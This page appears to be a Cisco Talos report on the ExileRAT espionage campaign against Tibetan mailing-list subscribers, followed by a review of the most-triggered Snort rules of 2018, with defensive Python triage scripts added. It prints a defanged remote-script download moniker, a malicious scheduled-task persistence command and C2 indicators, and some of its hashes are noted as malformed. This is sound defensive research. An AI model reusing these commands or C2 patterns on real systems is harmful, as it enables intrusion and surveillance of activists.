
ExileRAT shares C2 with LuckyCat, targets Tibet

Cisco Talos recently observed a malware campaign delivering malicious Microsoft PowerPoint documents through a mailing list operated by the Central Tibetan Administration (CTA), the official organization of the Tibetan government-in-exile. The document used in this attack is a PPSX file, a format used to distribute a non-editable slide show derived from a Microsoft PowerPoint document. In this case, an email sent to the CTA mailing list carried an attachment named "Tibet-was-never-a-part-oF-china.ppsx", aimed at the subscribers of the Tibet News mailing list. Given the targets and the nature of the malware, it is most likely intended for espionage rather than financial gain. This is one more instance of the continuing trend of state actors spying on civilians for political reasons.

Malicious Office document

Opening this document led us to an additional campaign that shares infrastructure and payloads. The command and control (C2) infrastructure used in this campaign was previously linked to LuckyCat, an Android- and Windows-based Trojan. With the C2 identified, we were able to find multiple campaigns hosted on it that use the same payloads or configurations. The malicious PPSX file acts as a dropper that fetches the payload by running a series of JavaScript scripts.

The PPSX document sent to the CTA mailing list was as follows:

Every subscriber of the CTA mailing list received this email. The mailing list infrastructure is operated by DearMail, an India-based service that describes itself as a "powerful cloud-based e-mail campaign manager". The attacker changed the standard Reply-To header normally used in CTA emails so that replies go to an attacker-controlled address at gmail[.]com.

The email message itself refers to the 60th anniversary of the Dalai Lama's exile on March 31. The document is a large slide show of more than 240 slides that claims to have been created by the Central Tibetan Administration.

The PPSX is in fact a copy of a legitimate PDF that can be downloaded from the Central Tibetan Administration's tibet.net website. The slide show's filename, "Tibet-was-never-a-part-of-China", is identical to that of the legitimate PDF published on November 1, 2018, showing that the attackers moved quickly to take advantage of it.

The attack exploits CVE-2017-0199, an arbitrary code execution vulnerability in Microsoft Office, and is built from a publicly available script on GitHub. The exploit code sits in the "slide1.xml.rels" file. The easiest way to get at these files is to unzip the PPSX (an OOXML package is a ZIP archive) and inspect the full document contents; the file is located in the "/ppt/slides/_rels" folder.

The relationship target is URL-encoded; decoded, it reads "script:hXXp://27[.]126[.]188[.]212:8005/aqqee".

The same script also appears in the app.xml file. Note, however, that the port number used there is wrong: that copy never actually runs, and no request to TCP port 8003 is observed.
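To illustrate the triage step just described, here is an added example (not code from the Talos post): it opens an OOXML package in memory, walks every *.rels part for relationships with TargetMode="External", URL-decodes their targets, and also greps every other XML part for a raw "script:" moniker, which covers both the slide relationship and the app.xml copy. The sample document it builds, the example.invalid host and the "stage1" resource are constructed placeholders, not the campaign's real artifacts.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Schemes worth flagging when they appear as an external relationship target;
# "script:" is the moniker the CVE-2017-0199 PPSX chain uses.
FLAGGED_SCHEMES = ("script:", "http:", "https:", "file:", "mhtml:")
SCRIPT_MONIKER = re.compile(r"script:[^\s\"'<>]+", re.IGNORECASE)


def scan_ooxml(package: bytes):
    """Return suspicious external references found in an OOXML package.

    PPSX/PPTX/DOCX files are ZIP archives of XML parts. Two checks are made:
    relationships with TargetMode="External" in any *.rels part, and raw
    "script:" monikers in any other XML part (the campaign document also
    carried a copy in docProps/app.xml). Targets are URL-decoded first,
    since the campaign encoded them."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            raw = zf.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(raw)
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") != "External":
                        continue
                    target = unquote(rel.get("Target", ""))
                    if target.lower().startswith(FLAGGED_SCHEMES):
                        rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                        findings.append({"part": name,
                                         "kind": f"external-rel/{rel_type}",
                                         "target": target})
            elif name.endswith(".xml"):
                text = unquote(raw.decode("utf-8", errors="replace"))
                for m in SCRIPT_MONIKER.finditer(text):
                    findings.append({"part": name, "kind": "script-moniker",
                                     "target": m.group()})
    return findings


def build_sample_ppsx() -> bytes:
    """Constructed minimal PPSX mirroring the campaign document's layout: one
    external relationship in ppt/slides/_rels/slide1.xml.rels and a copy of
    the encoded moniker in docProps/app.xml. example.invalid and "stage1" are
    placeholders, not the real C2 or resource name."""
    encoded = "script%3Ahttp%3A%2F%2Fexample.invalid%3A8005%2Fstage1"
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/slideLayout" '
        'Target="../slideLayouts/slideLayout1.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/'
        f'officeDocument/2006/relationships/hyperlink" Target="{encoded}" '
        'TargetMode="External"/>'
        "</Relationships>"
    )
    app = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        "<Properties><Application>Microsoft Office PowerPoint</Application>"
        f"<Company>{encoded}</Company></Properties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("ppt/slides/slide1.xml", '<?xml version="1.0"?><sld/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
        zf.writestr("docProps/app.xml", app)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_ooxml(build_sample_ppsx()):
        print(f'{hit["part"]}: {hit["kind"]} -> {hit["target"]}')
```

Run against a real sample, the first finding is the slide relationship and the second the app.xml copy; an external relationship whose decoded target starts with "script:" is never legitimate in a presentation and is enough on its own to quarantine the file.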

The script's execution is visible when the document is run under dynamic analysis in Threat Grid.

The PPSX also connects to iplocation to perform a geolocation lookup.

It then issues an HTTP request to the C2 server, specifically for the resource "aqqee". The HTTP response carries a spoofed Date header of "Sun 16 Apr 2017".

The C2 replies with a JavaScript script that downloads the payload, "syshost.exe", from the same C2.

This script is executed via WScript and, using cmd.exe, creates a scheduled task named "Diagnostic_System_Host". The name closely mimics the legitimate Windows task "Diagnostic System Host", differing only by the underscores. The /sc minute /mo 1 schedule re-runs the payload every minute, so the RAT is restarted if it is killed. The task is created with the following command line:

"C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn Diagnostic_System_Host /tr C:\Users\Administrator\AppData\Roaming\syshost.exe
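As an added example (not from the Talos post), the following script applies the hunting logic this persistence suggests to the output of `schtasks /query /fo CSV /v`: it normalises task names so underscore and space variants of a known-good name collide, flags actions that run from per-user AppData or Temp paths, and flags short repeat intervals. The CSV embedded below is constructed to mimic that output with only the relevant columns; the WS01 host and the "Adobe Acrobat Update Task" row are placeholders, and the baseline list of legitimate task names is illustrative.

```python
import csv
import io
import re

# Legitimate task names to compare against. Illustrative baseline only; in
# practice export the list from a known-clean host of the same Windows build.
KNOWN_TASK_NAMES = {
    "Diagnostic System Host",
    "Microsoft Compatibility Appraiser",
    "ScheduledDefrag",
}

# Paths a scheduled action should rarely run from: per-user AppData and Temp
# directories, which is where syshost.exe was dropped.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\AppData\\(Roaming|Local)\\|\\Temp\\|%(AppData|LocalAppData|Temp)%",
    re.IGNORECASE,
)


def normalise(name: str) -> str:
    """Drop the separators and case an attacker varies, so that
    'Diagnostic_System_Host' compares equal to 'Diagnostic System Host'."""
    return re.sub(r"[\s_\-]+", "", name).lower()


_NORMALISED_KNOWN = {normalise(n): n for n in KNOWN_TASK_NAMES}


def repeat_minutes(value: str):
    """Convert a 'Repeat: Every' cell such as '0:01:00' (H:M:S) to minutes;
    'N/A' and other non-durations give None."""
    parts = value.split(":")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        return None
    hours, minutes, _seconds = (int(p) for p in parts)
    return hours * 60 + minutes


def triage_schtasks_csv(text: str):
    """Parse `schtasks /query /fo CSV /v` output and return the tasks that
    match the persistence pattern above, each with the reasons it was flagged."""
    hits = []
    for row in csv.DictReader(io.StringIO(text)):
        name = row["TaskName"].rsplit("\\", 1)[-1]
        action = row["Task To Run"]
        reasons = []
        legit = _NORMALISED_KNOWN.get(normalise(name))
        if legit and legit != name:
            reasons.append(f"name mimics legitimate task '{legit}'")
        if USER_WRITABLE.search(action):
            reasons.append("action runs from a user-writable directory")
        every = repeat_minutes(row.get("Repeat: Every", ""))
        if every is not None and every <= 5:
            reasons.append(f"re-runs every {every} minute(s)")
        if reasons:
            hits.append({"task": name, "action": action, "reasons": reasons})
    return hits


# Constructed sample in the shape of `schtasks /query /fo CSV /v`, reduced to
# the columns used here. Host WS01 and the Adobe row are placeholders.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Schedule Type","Repeat: Every"
"WS01","\Diagnostic System Host","COM handler","Daily","N/A"
"WS01","\Diagnostic_System_Host","C:\Users\Administrator\AppData\Roaming\syshost.exe","One Time Only, Minute","0:01:00"
"WS01","\Adobe Acrobat Update Task","C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe","Daily","N/A"
'''


if __name__ == "__main__":
    for hit in triage_schtasks_csv(SAMPLE_SCHTASKS_CSV):
        print(hit["task"], "->", hit["action"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

Only the lookalike task is returned, with all three reasons. Any one of them alone is a weak signal (plenty of updaters run from AppData), which is why the script reports reasons rather than a verdict and leaves the ranking to the analyst.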

ExileRAT malware: syshost.exe

The infected system now runs ExileRAT, the syshost.exe binary served by the attacker's C2. Its compilation timestamp matches the campaign timeframe: Jan 30 07:05:47 2019 UTC.

One of the first things ExileRAT does is perform an IP geolocation lookup and write the result to a data.ini file.

This is easy to spot in the PE, and the C2 address is hardcoded in the PE as well:

ExileRAT is a simple RAT platform capable of collecting system information (computer name, username, drive listing, network adapters, process names), getting and pushing files, and executing or terminating processes.
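Two of the checks just made, the compile timestamp and the hardcoded C2, are cheap to reproduce on any sample. The following added example (not from the post) reads the COFF TimeDateStamp by following e_lfanew, extracts printable ASCII and UTF-16LE strings, and pulls out any IPv4:port endpoints. The PE it builds is a constructed stand-in with a valid header and no code; 192.0.2.10 is an RFC 5737 documentation address standing in for the real C2.

```python
import re
import struct
from datetime import datetime, timezone

ASCII_STRINGS = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_STRINGS = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
IPV4_ENDPOINT = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")


def pe_compile_time(pe: bytes) -> datetime:
    """Return the COFF header TimeDateStamp as an aware UTC datetime.

    Layout: the DOS header stores the PE header offset at 0x3C (e_lfanew);
    the 4-byte PE signature is followed by the COFF header, whose
    TimeDateStamp sits 8 bytes in, after Machine and NumberOfSections."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    stamp = struct.unpack_from("<I", pe, e_lfanew + 8)[0]
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def embedded_strings(pe: bytes):
    """Printable ASCII and UTF-16LE strings of six or more characters."""
    found = [m.group().decode("ascii") for m in ASCII_STRINGS.finditer(pe)]
    found += [m.group().decode("utf-16-le") for m in UTF16_STRINGS.finditer(pe)]
    return found


def network_indicators(pe: bytes):
    """IPv4 addresses (with optional port) hardcoded anywhere in the binary."""
    hits = set()
    for s in embedded_strings(pe):
        hits.update(IPV4_ENDPOINT.findall(s))
    return sorted(hits)


def build_sample_pe() -> bytes:
    """Constructed stand-in for syshost.exe: a valid MZ/PE/COFF header carrying
    the campaign's compile time (2019-01-30 07:05:47 UTC) followed by two
    embedded strings. 192.0.2.10 is an RFC 5737 documentation address used as
    a placeholder, not the real C2."""
    stamp = int(datetime(2019, 1, 30, 7, 5, 47, tzinfo=timezone.utc).timestamp())
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header at 0x40
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, 1, stamp, 0, 0, 0, 0x0102)
    body = (b"\x00" * 16
            + b"http://192.0.2.10:8005/aqqee\x00\x00"
            + "data.ini".encode("utf-16-le") + b"\x00" * 16)
    return bytes(dos) + b"PE\0\0" + coff + body


if __name__ == "__main__":
    sample = build_sample_pe()
    print("compiled:", pe_compile_time(sample).isoformat())
    print("network indicators:", network_indicators(sample))
```

A timestamp inside the campaign window is consistent with a purpose-built payload, but on its own it proves little: the field is writable, and some toolchains zero or randomise it. Treat it as one data point next to the hardcoded C2 and the behaviour observed in the sandbox.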

C2 infrastructure

The C2 used in this campaign was 27[.]126[.]188[.]212. We found an open directory on it containing other .exe and .dll files, including "ACRORD32.EXE" and "CCL100U.DLL". These files were served from "/1" on the C2, while the Tibet campaign's PPSX used "/2". It is common for threat actors to reuse infrastructure across campaigns. We also found a log file, "Robins.log", in a directory that appears to record new requests on TCP port 8005, which is likely what happened here.

While analysing the C2, we identified several domains pointing to this IP: mondaynews[.]tk, peopleoffreeworld[.]tk and gmailcom[.]tw. The attacker most likely registered the last one to imitate Google, hoping to fool users during phishing campaigns.

LuckyCat Android RAT

The C2 server IP hardcoded in syshost.exe has recently also been home to an interesting domain: mondaynews[.]tk. This domain is the C2 of an Android RAT created on January 3. It is a new version of the LuckyCat Android RAT that was used against Tibetan activists in 2012; in those attacks the actors targeted pro-Tibet sympathizers. The new version includes the same functionality as the 2012 version (file upload and download, information theft, remote shell), covering files, app execution, audio recording and personal contacts, and adds several new features such as SMS theft, recent call theft and theft of location information. The 2012 command type class (left) and the 2019 command type class (right) are shown below:

Several of these functions share the same names across the two versions, and many are copied and pasted:

Baidu's Maps API is also included in the app:

The malware checks whether it has root privileges on the Android device and, if it does, changes the permissions of a specific directory (/data/data/com.tencent.mm/):

This directory holds the encryption keys of the WeChat chat application. Given the espionage-oriented nature of LuckyCat Android RAT and the profile of its victims, we conclude that the malware changes the permissions so the attacker can obtain these keys and decrypt chat messages. As the code above shows, the malware runs chmod 777 on the Tencent directory, opening it up so that files and keys can be read from it. The attacker can then exfiltrate this data using the malware's upload command.

Conclusion

This attack is the latest evolution in a series of attacks targeting political sympathizers, and is further evidence that not all attacks require zero-day vulnerabilities. For example, the attack we called Persian Stalker in November took advantage of weaknesses in secure messaging apps to steal messages users believed were private. Another attack last year in India also targeted mobile devices, using malicious mobile device management (MDM) software. This PPSX document used the CVE-2017-0199 vulnerability to download additional payloads onto victims. Clearly, the defensive best practice of patching known vulnerabilities remains important and helps protect organizations from this kind of attack. These specific attacks are most likely conducted for espionage rather than financial gain. By disclosing this campaign, Cisco Talos hopes to disrupt the attack and force the adversary to retool.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. Below is a screenshot showing how AMP can protect customers from this threat.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects the malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and builds protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise (IOCs)

The IOCs related to this campaign are as follows:

Malicious Office document

PE32 ExileRAT

3eb026d8b778716231a07b3dbbdc99e2d3a635b1956de8a1e6e6efc659330e52de (SHA256; the value is malformed in the source)

LuckyCat Android RAT

9498ddbfe296e98376187be67b768f3ba053a7cbdfeeda61e28c40bd21365f0 (2019 sample, SHA256; truncated in the source)
2012 sample: SHA256 unreadable in the source

C2 servers

27[.]126[.]188[.]212
mondaynews[.]tk
peopleoffreeworld[.]tk
gmailcom[.]tw

2018 in Snort rules

February 6, 2019 8:19 am

This blog post was written by Benny Ketelslegers of Cisco Talos. The cyber security field shifted considerably in 2018. The boom in cryptocurrencies drove a transition from ransomware to cryptocurrency mining. Talos researchers also saw APT campaigns, notably VPNFilter, which affected small office and home office network devices, and Olympic Destroyer, which appeared designed to disrupt the Winter Olympics.

However, such high-profile attacks are only a small part of the defensive work done every day. This post reviews some of the insights gained by investigating the most frequently triggered Snort rules as reported by Cisco Meraki systems. These rules protect our customers from the most common attacks, which can cause damaging results like Olympic Destroyer. Snort is a free, open source network intrusion prevention system. Cisco Talos releases new rules for Snort every week to protect against software vulnerabilities and the latest malware.

Top 5 rules

Snort rules trigger on a variety of network behaviours, such as probing of network systems, attempts to exploit systems, and known malicious command and control traffic. Each rule detects a specific network activity and has a unique identifier made up of three parts: the generator ID (GID), the rule ID (SID) and the revision number. The GID identifies which part of Snort generated the event; for example, "1" indicates that the event was generated by the text rules subsystem. The SID uniquely identifies the rule itself, and SID information can be looked up with the search tool on the Snort website. The revision number is the version of the rule; always use the latest revision of a rule.

Snort rules are classified into classtypes based on the type of activity they detect. The most commonly reported classtypes are "Policy-Violation", followed by "Trojan-Activity" and "Attempted-Admin". Lower-frequency classtypes such as "attempted-user" and "web-application-attack" are particularly interesting for detecting malicious inbound and outbound network traffic.

Devices managed by Cisco Meraki protect customers' networks and give an overview of the wider threat environment. Below are the most triggered rules in the policy, in reverse order.

#5: 1:43687:2 "Suspicious .bit DNS query"

The .bit top-level domain is relatively obscure, but it is sometimes used to host malware command and control (C2) systems; Necurs is one of the families that has used it as part of its botnet communications. The .bit TLD is managed through Namecoin, a decentralized ledger with no central authority and one of the first forks of the Bitcoin cryptocurrency. The decentralized nature of .bit means that few DNS servers resolve these domains, but it also makes them resistant to takedown.

#4: 1:41978:5 "Microsoft Windows SMB remote code execution attempt"

In 2017, a vulnerability in SMBv1 (MS17-010) that allows a remote attacker to execute arbitrary code via crafted packets was disclosed, and in May of that year it was used by the network worms WannaCry and Nyetya. Although this rule did not make the top five in 2017, 2018 saw a great deal of scanning for and attempted exploitation of this vulnerability. This underlines the importance of network defenses and of a patch management program that applies patches as promptly as possible.

Organizations should ensure that devices running Windows are fully patched. Additionally, SMB ports 139 and 445 should be blocked on all externally accessible hosts.

#3: 1:39867:4 "Suspicious .tk DNS query"

The .tk top-level domain belongs to Tokelau, a territory in the South Pacific. Its registry allows users to register domains free of charge, which has made .tk one of the most registered top-level domains. That same free registration also makes .tk domains a popular choice for malicious use.

This rule triggers on a DNS lookup of a .tk domain. Such a lookup is not necessarily malicious, but it can be a useful indicator of suspicious activity on your network. If you notice a sudden increase in triggers of this rule, you should investigate the cause, especially if a single device accounts for a large share of them.

Similar rules that detect DNS lookups to other rarely used top-level domains such as .bit, .pw and .top also made it into the list of the top 20 most triggered rules.
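The investigation the paragraph recommends, attributing rare-TLD lookups to the hosts that make them, is a short aggregation job. The following is an added example (not from the Talos post) that tallies .bit/.tk/.pw/.top queries per client from a resolver query log and reports any client responsible for at least half of them. The log lines are constructed in a simple "timestamp client qtype qname" format, the 10.0.0.x client addresses are placeholders, example.bit is a placeholder name, and the two .tk names are the ones discussed on this page.

```python
import re
from collections import Counter, defaultdict

# TLDs the Snort rules above watch for: free or obscure to register, resolvable
# only through non-standard infrastructure, and rarely seen in clean traffic.
RARE_TLDS = {"bit", "tk", "pw", "top"}

# Constructed log format: "<timestamp> <client-ip> <qtype> <qname>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>[\d.]+)\s+(?P<qtype>\w+)\s+(?P<qname>\S+)$")


def tld_of(qname: str) -> str:
    """Last label of a query name, ignoring a trailing dot and case."""
    return qname.rstrip(".").rsplit(".", 1)[-1].lower()


def rare_tld_report(lines, share_threshold: float = 0.5):
    """Count lookups of rare TLDs per client and per TLD, and single out any
    client responsible for at least share_threshold of them, which is the
    case the paragraph above says deserves investigation first."""
    by_client, by_tld = Counter(), Counter()
    names = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        tld = tld_of(m["qname"])
        if tld not in RARE_TLDS:
            continue
        by_client[m["client"]] += 1
        by_tld[tld] += 1
        names[m["client"]].add(m["qname"].rstrip(".").lower())
    total = sum(by_client.values())
    dominant = [
        (client, count / total)
        for client, count in by_client.most_common()
        if total and count / total >= share_threshold
    ]
    return {
        "total": total,
        "by_tld": dict(by_tld),
        "by_client": dict(by_client),
        "dominant_clients": dominant,
        "names": {c: sorted(n) for c, n in names.items()},
    }


# Constructed resolver log. 10.0.0.x clients are placeholders; the .tk names
# are the ones discussed on this page and example.bit is a placeholder.
SAMPLE_DNS_LOG = [
    "2019-01-30T07:05:47Z 10.0.0.7 A mondaynews.tk",
    "2019-01-30T07:05:48Z 10.0.0.7 A mondaynews.tk.",
    "2019-01-30T07:05:49Z 10.0.0.7 A MondayNews.TK",
    "2019-01-30T07:06:01Z 10.0.0.7 A peopleoffreeworld.tk",
    "2019-01-30T07:06:02Z 10.0.0.7 A example.bit",
    "2019-01-30T07:06:03Z 10.0.0.7 A example.bit",
    "2019-01-30T07:06:10Z 10.0.0.9 A mondaynews.tk",
    "2019-01-30T07:06:11Z 10.0.0.9 A example.bit",
    "2019-01-30T07:06:12Z 10.0.0.9 A www.cisco.com",
    "2019-01-30T07:06:13Z 10.0.0.3 AAAA tibet.net",
]


if __name__ == "__main__":
    report = rare_tld_report(SAMPLE_DNS_LOG)
    print("rare-TLD lookups:", report["total"], report["by_tld"])
    for client, share in report["dominant_clients"]:
        print(f"{client} made {share:.0%} of them: {report['names'][client]}")
```

On the sample, 10.0.0.7 accounts for 75% of the rare-TLD lookups and is the host to pull for triage; the trailing-dot and mixed-case variants are folded into the same name so repeated lookups of one C2 domain are counted together.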

#2: 1:35030:1 & 1:23493:6 "Win.Trojan.Zeus variant outbound connection"

This trojan has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click fraud, and carry out many other criminal activities. It is the engine behind notorious botnets such as Kneber, which made global headlines.

In early 2018, Talos observed a Zeus variant delivered via the official website of Crystal Finance Millennium (CFM), a Ukraine-based accounting software developer.

This vector is similar to the attacks Talos outlined in a blog post about Nyetya and the related MeDoc compromise. Ukrainian authorities and businesses had been alerted by a local security firm (ISSP) that another accounting software vendor had been compromised. The CFM website was used to host malware that was retrieved by a downloader attached to messages from a coordinated spam campaign.

Since the leak of the Zeus source code in 2011, numerous variants have appeared, including Zeus Panda, which spreads by poisoning Google search results.

#1: 1:46237:1 "PUA-OTHER Cryptocurrency Miner outbound connection attempt" & 1:45549:4 "PUA-OTHER XMRig cryptocurrency mining pool connection attempt"

Over the past year, the explosion of malicious cryptomining has sent shock waves through the threat landscape. Cisco Talos created a number of rules throughout the year to combat cryptomining threats, and this rule, deployed in early 2018, has proven to be number one in terms of the volume of activity it detected and prevented. The threat has spread like wildfire across the internet, delivered through multiple vectors including email, the web, and active exploitation. It is no surprise that these two rules, taken together, were the most frequently observed Snort rules of 2018.

Cryptomining consumes large amounts of computing power and energy, both of which are valuable to organizations.

For an overview of all the relevant Snort rules and for more on the methods and techniques Cisco Talos uses to stop cryptomining, download the Talos whitepaper here.

INBOUND vs. OUTBOUND

Network traffic can cross an IDS from the external to the internal interface (inbound) or from the internal to the external interface (outbound); depending on the architecture of the environment, some traffic may also avoid being filtered by a firewall or inspected by an IPS/IDS device altogether. Where traffic is inspected, alerts are triggered and logged depending on the rule set and the sensor configuration.

During 2018, outbound rules were triggered far more frequently than inbound rules, by a ratio of approximately 6.9 to 1. Inbound alerts are more likely to reflect attacks on server-side applications such as web applications and databases, whereas outbound alerts are more likely to reflect outgoing traffic from malware-infected endpoints.
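Reproducing this kind of breakdown on your own sensor output is straightforward once the alert line is parsed. The following added example (not from the Talos post) parses Snort "fast" alert lines, splits each rule identifier into GID:SID:rev as described above, classifies direction against a HOME_NET list, and returns the top rules, the per-classification counts and the outbound-to-inbound ratio. The alert lines are constructed for the example: the rule identifiers are the ones discussed on this page, but the hosts, ports and timestamps are placeholders, and the classification text is assumed rather than taken from the rule files.

```python
import ipaddress
import re
from collections import Counter

# Snort "fast" alert format (-A fast), one line per event, e.g.
# 01/30-07:05:47.123456  [**] [1:46237:1] MSG [**] [Classification: X] [Priority: 3] {TCP} 10.0.0.5:49152 -> 203.0.113.7:3333
ALERT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<pri>\d+)\]\s+"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+)(?::\d+)?\s+->\s+(?P<dst>[\d.]+)(?::\d+)?\s*$"
)

# Internal address space; adjust to your $HOME_NET.
HOME_NETS = [ipaddress.ip_network("10.0.0.0/8")]


def parse_alert(line: str):
    """Split one fast-format line into its fields, or None if it is not one.
    The rule identifier is GID:SID:rev as described above; GID 1 means the
    text rules subsystem."""
    m = ALERT_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["rule"] = f'{fields["gid"]}:{fields["sid"]}:{fields["rev"]}'
    return fields


def direction(src: str, dst: str, home_nets) -> str:
    """Classify a flow relative to the home networks."""
    def is_home(ip):
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in home_nets)
    src_home, dst_home = is_home(src), is_home(dst)
    if src_home and not dst_home:
        return "outbound"
    if dst_home and not src_home:
        return "inbound"
    return "internal" if src_home else "external"


def summarise_alerts(lines, home_nets=HOME_NETS):
    """Count alerts per rule, per classification and per direction, and return
    the outbound-to-inbound ratio (None if nothing inbound was seen)."""
    by_rule, by_class, by_dir = Counter(), Counter(), Counter()
    for line in lines:
        alert = parse_alert(line)
        if alert is None:
            continue
        by_rule[alert["rule"]] += 1
        by_class[alert["cls"] or "unclassified"] += 1
        by_dir[direction(alert["src"], alert["dst"], home_nets)] += 1
    ratio = by_dir["outbound"] / by_dir["inbound"] if by_dir["inbound"] else None
    return {
        "top_rules": by_rule.most_common(),
        "by_class": dict(by_class),
        "by_direction": dict(by_dir),
        "outbound_to_inbound": ratio,
    }


# Constructed alerts: rule IDs are those discussed on this page; hosts, ports
# and timestamps are placeholders (RFC 5737 ranges on the external side) and
# the classification text is assumed.
SAMPLE_ALERTS = [
    "01/30-07:05:47.123456  [**] [1:46237:1] PUA-OTHER Cryptocurrency Miner outbound connection attempt [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.0.5:49152 -> 203.0.113.7:3333",
    "01/30-07:05:52.000001  [**] [1:46237:1] PUA-OTHER Cryptocurrency Miner outbound connection attempt [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.0.5:49160 -> 203.0.113.7:3333",
    "01/30-07:05:58.000002  [**] [1:46237:1] PUA-OTHER Cryptocurrency Miner outbound connection attempt [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.0.0.9:51020 -> 203.0.113.8:3333",
    "01/30-07:06:12.000003  [**] [1:35030:1] MALWARE-CNC Win.Trojan.Zeus variant outbound connection [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.0.7:50122 -> 198.51.100.23:80",
    "01/30-07:06:40.000004  [**] [1:39867:4] INDICATOR-COMPROMISE Suspicious .tk dns query [**] [Classification: Misc activity] [Priority: 3] {UDP} 10.0.0.7:53412 -> 203.0.113.53:53",
    "01/30-07:07:01.000005  [**] [1:43687:2] INDICATOR-COMPROMISE Suspicious .bit dns query [**] [Classification: Misc activity] [Priority: 3] {UDP} 10.0.0.9:53988 -> 203.0.113.53:53",
    "01/30-07:08:15.000006  [**] [1:41978:5] OS-WINDOWS Microsoft Windows SMB remote code execution attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 198.51.100.77:4444 -> 10.0.0.3:445",
    "01/30-07:08:16.000007  [**] [1:41978:5] OS-WINDOWS Microsoft Windows SMB remote code execution attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 198.51.100.78:4444 -> 10.0.0.3:445",
    "# not an alert line",
]


if __name__ == "__main__":
    summary = summarise_alerts(SAMPLE_ALERTS)
    print("top rules:", summary["top_rules"][:3])
    print("by direction:", summary["by_direction"],
          "ratio:", summary["outbound_to_inbound"])
```

The direction split only means something if HOME_NETS really matches the sensor's $HOME_NET; a sensor that sees NAT'd traffic or an incomplete home list will misfile flows as "external" or "internal", which is exactly the architectural caveat the paragraph above makes.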

Looking more closely at these data sets, we see the following:

For inbound traffic, Trojan activity was previously the most prevalent rule type, accounting for 42.5% of all alerts, but "Server-Apache" now leads, with "OS-Windows" a close second.

The "Server-Apache" classtype covers Apache-related attacks, in this case mainly 1:41818 and 1:41819, which detect exploitation of the Jakarta Multipart parser vulnerability in Apache Struts (CVE-2017-5638). Later in 2017, a second Apache Struts vulnerability (CVE-2017-9805) was discovered, and together these made this rule type the most observed in IDS alerts in 2018.

The "OS-Windows" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability (MS17-010) exploited by WannaCry and NotPetya.

The "Browser-Plugins" classtype covers attempts to exploit browser vulnerabilities related to browser plugins (e.g. ActiveX). Most of the 2018 activity appears to come from SID 1:8068, specifically related to the "Microsoft Outlook Security Feature Bypass Vulnerability" (CVE-2017-11774).

